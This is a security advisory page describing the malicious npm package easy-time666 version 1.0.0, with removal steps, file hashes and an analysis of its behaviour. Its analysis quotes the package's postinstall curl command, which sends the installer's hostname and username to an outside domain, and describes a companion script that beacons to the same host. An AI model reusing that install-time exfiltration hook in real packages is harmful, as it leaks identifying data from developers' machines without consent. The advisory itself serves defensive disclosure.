Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

easy-time666npm

Malicious code in easy-time666 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5749
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall easy-time666

What this malware does

package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami) over plain HTTP on every npm install, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON {ping:'npm'} to the same host (npm.wdf1.eyes.sh) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22
8d01edd925624ba53c0b659eab068e8252c70d276315c8074962dd29bdf9dd6c

Frequently asked questions

No. easy-time666 on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006401IN-MAL-2026-006402

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
easy-time666 (npm) malicious package — MAL-2026-5749 | O3 Security